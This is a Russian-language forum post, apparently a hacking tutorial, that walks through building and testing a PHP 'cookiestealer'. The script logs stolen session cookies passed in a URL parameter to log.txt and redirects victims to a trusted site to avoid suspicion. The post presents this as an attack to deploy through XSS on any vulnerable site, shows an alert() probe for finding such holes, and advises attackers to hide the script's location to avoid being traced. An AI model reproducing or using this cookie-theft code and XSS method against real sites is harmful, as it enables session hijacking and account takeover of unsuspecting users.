[SIZE=4][B]#Обработка cookies через PHP[/B][/SIZE] Для начала, создадим новый [B]php[/B]-файл (для тех, кто не знаком с [B]php[/B], рекомендую посмотреть[URL='https://t.me/omnitools/22'] вот это вот[/URL]) в той же директории, где лежит наш [B]index.html[/B]: nano cookiestealer.php Code [SIZE=4][B]#Обработка cookies через PHP[/B][/SIZE] Для начала, создадим новый [B]php[/B]-файл (для тех, кто не знаком с [B]php[/B], рекомендую посмотреть[URL='https://t.me/omnitools/22'] вот это вот[/URL]) в той же директории, где лежит наш [B]index.html[/B]: nano cookiestealer.php После добавления стандартных php-скобок, определим в файле место для редиректа (перенаправления пользователя): <?php header ('Location:https://google.com'); ?> Code <?php header ('Location:https://google.com'); ?> *Примечание: сайт может быть любым, но лучше использовать доверенный – это вызовет меньше подозрений. Теперь, имея редирект, можем добавить коду для обработки cookies. Сначала определим их в переменной $cookies = $_GET"c"; Code $cookies = $_GET"c"; Далее укажем файл (например, “log.txt”) для сохранения cookies на нашем сервере: $file = fopen('log.txt', 'a'); Code $file = fopen('log.txt', 'a'); Наконец, запишем наши cookies в файл с отступом в две строки (удобочитаемость – это круто): fwrite($file, $cookies . "\n\n"); Code fwrite($file, $cookies . "\n\n"); Должно стать похожим на это: Сохраним. #Тестируем наш cookie-****** Не выходя из нашей уже обшарканной директории, исполним команду: php -S 127.0.0.1:80 Code php -S 127.0.0.1:80 Так мы запустим тестовый сервер по указанному нами адресу. Теперь введите в строке браузера указанный Вами IP... ...скорее всего, Вас сразу же перебросит на редирект. Если же посмотрим на **** нашего PHP-сервера, увидим, что данные были переданы в наш файл. Проверим, открыв файл log.txt: cat log.txt Code cat log.txt Какая удача, файл действительно содержит только что переданные cookies – наш ****** работает! #Проведение атаки Этот метод ценен своей простотой и объемом наносимого ущерба, а возможности реализации простираются до любого сайта, где можно использовать HTML-тег <script> (=XSS уязвимость). Популярный способ проверки веб-формы на XSS уязвимость – использование обычной функции “alert” как в примере ниже. <script>alert("Alert");</script> Code <script>alert("Alert");</script> Так же, в Kali Linux имеются уже встроенные инструменты для проверки XSS-дыр, но о них я расскажу Вам уже в отдельной статье – подписывайтесь сейчас, если не решались на это ранее P.S. В настоящих атаках нужно с осторожностью относиться к местонахождению php-скрипта. Пренебрежение этой рекомендации может повлечь ситуации, в которых путь от файла до Вас смогут отследить, а Вам сломать лицо.